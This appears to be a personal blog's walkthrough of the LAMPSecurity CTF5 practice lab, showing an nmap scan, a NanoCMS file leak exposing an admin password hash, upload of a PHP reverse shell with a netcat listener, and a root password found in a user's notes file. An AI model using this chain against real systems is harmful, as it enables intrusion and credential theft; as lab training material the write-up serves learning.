Core dump overflow

Core dump in progress...

Pentest lab - LAMPSecurity CTF5

| Comments

Continuing the LAMPSecurity series, the next machine I’m going after is CTF5.

Recon

Nmap scan reveals there are plenty of open ports:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19

nmap -sS -sV -p1-65535 192.168.80.154

Starting Nmap 6.49BETA5 ( https://nmap.org ) at 2016-05-09 12:17 EDT
Nmap scan report for 192.168.80.154
Host is up, received arp-response (0.00024s latency).
Not shown: 65524 closed ports
Reason: 65524 resets
PORT      STATE SERVICE     REASON         VERSION
22/tcp    open  ssh         syn-ack ttl 64 OpenSSH 4.7 (protocol 2.0)
25/tcp    open  smtp        syn-ack ttl 64 Sendmail 8.14.1/8.14.1
80/tcp    open  http        syn-ack ttl 64 Apache httpd 2.2.6 ((Fedora))
110/tcp   open  pop3        syn-ack ttl 64 ipop3d 2006k.101
111/tcp   open  rpcbind     syn-ack ttl 64 2-4 (RPC #100000)
139/tcp   open  netbios-ssn syn-ack ttl 64 Samba smbd 3.X (workgroup: MYGROUP)
143/tcp   open  imap        syn-ack ttl 64 University of Washington IMAP imapd 2006k.396 (time zone: -0400)
445/tcp   open  netbios-ssn syn-ack ttl 64 Samba smbd 3.X (workgroup: MYGROUP)
901/tcp   open  http        syn-ack ttl 64 Samba SWAT administration server
3306/tcp  open  mysql       syn-ack ttl 64 MySQL 5.0.45
38972/tcp open  status      syn-ack ttl 64 1 (RPC #100024)

I searched for exploits for the versions of the listed services, but I couldn’t find anything usable. So it’s back to the web server..

Web server

The website provides some potential entry points that we’ll have to take a closer look at:

phake org

We can register for a mailing list:

mailing list

Tampering with the about page URL http://192.168.80.154/?page=about gives errors, so LFI might be possible

The blog page also has an admin login page and another Squirrel Mail page:

blog

The contact form allows you to send a message to the staff, and there is another app that acts as an event manager:

event planner

Also, on port 901 there is a Samba SWAT server protected by basic authentication. This server provides a web-based interface for configuring Samba.

Exploiting the CMS

I made an account on the event manager, but that doesn’t seem to help me much besides creating new blog posts. Next I tested to see if there might be any SQLi in the contact form, but no luck there either. And despite the path traversal error, I wasn’t able to navigate to any arbitrary files on the system.

It turns out I had actually overlooked an important information. On Andy Carp’s blog, we can see the site is powered by NanoCMS. I noticed it but I didn’t give it any thought. When I finally thought to click on it and learn more, it took me to a domain-for-sale page, so I figured it might be some simulated CMS created for this challenge only. Good that I thought to google it and see how wrong I was :p NanoCMS is a lightweight CMS based on PHP that is now discontinued. However, I found a super useful NanoCMS security review that made possible the compromising of the target ;)

Among the vulnerabilities present in the CMS, there is one that allows unrestricted access to the /data/pagesdata.txt. This file contains the username and password hash of the administrator:

1

a:12:{s:8:"homepage";s:1:"1";s:10:"links_cats";a:4:{s:7:"sidebar";a:2:{i:0;i:1;i:1;i:4;}s:11:"other-pages";a:0:{}s:14:"top-navigation";a:2:{i:0;s:1:"1";i:1;s:1:"4";}s:12:"Footer-Right";a:2:{i:0;s:1:"1";i:1;s:1:"4";}}s:5:"slugs";a:2:{i:1;s:4:"home";i:4;s:7:"contact";}s:6:"titles";a:2:{i:1;s:4:"Home";i:4;s:7:"Contact";}s:10:"slug_count";i:11;s:8:"settings";a:3:{s:19:"index-last-modified";i:1234513760;s:18:"def-template-areas";a:4:{i:0;s:12:"website name";i:2;s:14:"website slogan";i:3;s:16:"below navigation";i:4;s:16:"copyright notice";}s:18:"def-template-links";a:2:{i:0;s:14:"top-navigation";i:1;s:12:"Footer-Right";}}s:13:"active-tweaks";a:2:{i:0;s:7:"deutsch";i:1;s:19:"language-pack-tweak";}s:11:"lang-select";s:7:"english";s:6:"seourl";s:1:"0";s:8:"username";s:5:"admin";s:8:"password";s:32:"9d2f75377ac0ab991d40c91fd27e52fd";s:7:"version";s:4:"v_4f";}

I cracked the hash with my favorite online cracker and found out the password is shannon. Next, I logged in to the admin panel:

admin panel

Now we have the ability to add new pages with our own PHP code. I used pentestmonkey’s reverse PHP shell. I changed the IP and port, and set up a netcat listener to catch the reverse connection. Then I clicked on the newly created page on the blog and looked to my netcat for the goodies:

1
2
3
4
5
6
7
8
9
10

nc -vvnlp 5555
listening on [any] 5555 ...
connect to [192.168.80.155] from (UNKNOWN) [192.168.80.154] 43028
Linux localhost.localdomain 2.6.23.1-42.fc8 #1 SMP Tue Oct 30 13:55:12 EDT 2007 i686 i686 i386 GNU/Linux
 11:02:41 up  3:30,  0 users,  load average: 0.24, 0.05, 0.02
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
uid=48(apache) gid=48(apache) groups=48(apache) context=system_u:system_r:httpd_t:s0
sh: no job control in this shell
sh-3.2$ whoami
apache

Time for some enumeration! Looking in the home directory, I noticed quite a few user folders:

1
2
3
4
5
6

sh-3.2$ ls
amy
andy
jennifer
loren
patrick

I looked inside them with ls -al. The content was very similar among them and I could find nothing interesting in the files I was allowed to read. Until patrick’s directory, that contained more hidden files than the others:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45

sh-3.2$ ls -al patrick
total 344
drwxrwxr-x 25 patrick patrick 4096 Dec  5  2012 .
drwxr-xr-x  7 root    root    4096 Apr 28  2009 ..
-rw-------  1 patrick patrick    0 Dec  5  2012 .ICEauthority
drwx------  2 patrick patrick 4096 Apr 28  2009 .Trash
-rw-------  1 patrick patrick  530 Dec  5  2012 .bash_history
-rw-r--r--  1 patrick patrick   33 Aug 31  2007 .bash_logout
-rw-r--r--  1 patrick patrick  176 Aug 31  2007 .bash_profile
-rw-r--r--  1 patrick patrick  124 Aug 31  2007 .bashrc
drwxr-xr-x  2 patrick patrick 4096 Apr 28  2009 .config
-rw-r--r--  1 patrick patrick   28 Apr 29  2009 .dmrc
drwxrwxr-x  8 patrick patrick 4096 Apr 29  2009 .evolution
drwx------  5 patrick patrick 4096 Dec  5  2012 .gconf
drwx------  2 patrick patrick 4096 Dec  5  2012 .gconfd
drwxrwxr-x  3 patrick patrick 4096 Apr 28  2009 .gnome
drwxr-xr-x  7 patrick patrick 4096 Dec  5  2012 .gnome2
drwx------  2 patrick patrick 4096 Apr 28  2009 .gnome2_private
drwxr-xr-x  2 patrick patrick 4096 Apr 28  2009 .gstreamer-0.10
-rw-rw-r--  1 patrick patrick  146 Dec  5  2012 .gtk-bookmarks
-rw-r--r--  1 patrick patrick   89 Apr 28  2009 .gtkrc-1.2-gnome2
drwxr-xr-x  3 patrick patrick 4096 Apr 28  2009 .local
-rw-rw-r--  1 patrick patrick   18 Apr 29  2009 .mailboxlist
drwx------  3 patrick patrick 4096 Apr 28  2009 .metacity
drwx------  3 patrick patrick 4096 Apr 28  2009 .mozilla
-rw-------  1 patrick patrick   37 Apr 29  2009 .mysql_history
drwxr-xr-x  3 patrick patrick 4096 Dec  5  2012 .nautilus
-rw-rw-r--  1 patrick patrick  773 Dec  5  2012 .recently-used.xbel
drwxrwxr-x  4 patrick patrick 4096 Dec  5  2012 .tomboy
-rw-r--r--  1 patrick patrick 5128 Dec  5  2012 .tomboy.log
drwxr-xr-x  2 patrick patrick 4096 Dec  5  2012 .wapi
-rw-r--r--  1 patrick patrick  847 Dec  5  2012 .xsession-errors
-rw-r--r--  1 patrick patrick  658 Oct 11  2007 .zshrc
drwxr-xr-x  2 patrick patrick 4096 Apr 28  2009 Desktop
drwxr-xr-x  2 patrick patrick 4096 Apr 28  2009 Documents
drwxr-xr-x  2 patrick patrick 4096 Apr 28  2009 Download
-rw-------  1 patrick patrick  509 Apr 29  2009 Drafts
drwxr-xr-x  2 patrick patrick 4096 Apr 28  2009 Music
drwxr-xr-x  2 patrick patrick 4096 Apr 28  2009 Pictures
drwxr-xr-x  2 patrick patrick 4096 Apr 28  2009 Public
-rw-------  1 patrick patrick 4329 Apr 29  2009 Sent
drwxr-xr-x  2 patrick patrick 4096 Apr 28  2009 Templates
-rw-------  1 patrick patrick 1243 Apr 29  2009 Trash
drwxr-xr-x  2 patrick patrick 4096 Apr 28  2009 Videos
-rwxrw----  1 patrick patrick    0 Apr 29  2009 test.txt

I couldn’t read the .mysql_history or test.txt files, but the next one I tried, the .tomboy.log file, was really interesting! I only show the interesting bits here:

1
2
3
4
5
6
7
8
9
10
11

sh-3.2$ cat .tomboy.log
...
12/5/2012 7:24:34 AM [DEBUG]: Creating Buffer for 'New Note 3'...
12/5/2012 7:24:34 AM [DEBUG]: New Note 3 tags:
12/5/2012 7:24:38 AM [DEBUG]: Saving 'New Note 3'...
12/5/2012 7:24:46 AM [DEBUG]: Renaming note from New Note 3 to Root password
12/5/2012 7:24:56 AM [DEBUG]: Saving 'Root password'...
12/5/2012 7:25:03 AM [DEBUG]: Saving 'Root password'...
12/5/2012 7:27:41 AM [DEBUG]: Received request for saving session
12/5/2012 7:27:41 AM [DEBUG]: Saving unsaved notes...
12/5/2012 7:27:41 AM [DEBUG]: All done.  Ciao!

Tomboy is a note-taking application and it looks like the root password was saved in a note?! I went to the .tomboy directory and found some notes:

1
2
3
4
5
6
7

sh-3.2$ ls
481bca0d-7206-45dd-a459-a72ea1131329.note
addin-db-000
addins
ae9cfc26-64e8-4f6f-a8b4-0296e8173504.note
d2684fad-3aab-444c-b90a-4f307c0818f6.note
manifest.xml

Found the jackpot in the first one!

1
2
3
4
5
6
7
8
9
10

sh-3.2$ cat 481bca0d-7206-45dd-a459-a72ea1131329.note
<?xml version="1.0" encoding="utf-8"?>
<note version="0.2" xmlns:link="http://beatniksoftware.com/tomboy/link" xmlns:size="http://beatniksoftware.com/tomboy/size" xmlns="http://beatniksoftware.com/tomboy">
  <title>Root password</title>
  <text xml:space="preserve"><note-content version="0.1">Root password

Root password

50$cent</note-content></text>
...

Now all that is left is to become root! I SSH’ed with the root credentials and the machine is mine now!

Concluding remarks

This was another cool challenge in the LAMPSecurity series! The exploitation was possible because of the vulnerable CMS that not only disclosed credentials, but also allowed an attacker to execute code on the target. Although the foothold gained was under an unprivileged user, certain files of the home directories were readable when they shouldn’t have been, and the root password was sitting in an unprotected file for anyone to read. A good example of how a chain of misconfigurations can lead to total compromise of a machine.

1
2
3
4
5
6
7
8
9

/ It's lucky you're going so slowly, \
| because you're going in the wrong  |
\ direction.                         /
 ------------------------------------
        \   ^__^
         \  (oo)\_______
            (__)\       )\/\
                ||----w |
                ||     ||

Comments